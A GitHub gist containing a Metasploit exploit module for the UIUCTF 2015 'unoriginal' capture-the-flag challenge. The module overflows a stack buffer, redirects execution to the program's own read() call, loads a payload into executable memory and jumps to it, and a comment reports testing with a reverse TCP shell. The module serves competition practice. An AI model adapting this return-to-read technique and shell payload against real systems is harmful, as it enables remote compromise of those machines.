Last active
March 22, 2018 03:53
-
-
Save jgor/f5dba5c744ac7e8a6120 to your computer and use it in GitHub Desktop.
UIUCTF 2015 - pwn - unoriginal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit4 < Msf::Exploit::Remote | |
include Msf::Exploit::Remote::Tcp | |
def initialize | |
super( | |
'Name' => 'uiuctf unoriginal', | |
'Description' => %q{ | |
This module exploits the UIUCTF 2015 pwn - unoriginal challenge. | |
}, | |
'Author' => 'jgor', | |
'Arch' => ARCH_X86, | |
'Platform' => 'linux', | |
'License' => MSF_LICENSE, | |
'Targets' => | |
[ | |
[ 'Automatic', {} ], | |
] | |
) | |
register_options( | |
[ | |
Opt::RPORT(1235) | |
], | |
self.class | |
) | |
end | |
def exploit | |
dest = 0x08049748 # start of .data | |
read_gadget = 0x0804843f # read() call within func() | |
fd = 0 | |
read_count = payload.encoded.length + 5 | |
connect | |
buf = '' | |
# overflow buffer | |
buf << "\x41" * 13 | |
# set up frame pointer | |
buf << [dest-4].pack('L') | |
# overwrite RET -> jump to existing read() call | |
buf << [read_gadget].pack('L') | |
# set up args to read() | |
buf << [fd].pack('N') # file descriptor 0 | |
buf << [dest].pack('L') # start of .data (mem range is rwx) | |
buf << [read_count].pack('N') # count to read | |
sock.put(buf) | |
buf = '' | |
# return to payload 4 bytes ahead | |
buf << [dest+4].pack('L') | |
# msf payload (tested with linux/x86/shell/reverse_tcp) | |
buf << payload.encoded | |
sock.put(buf) | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment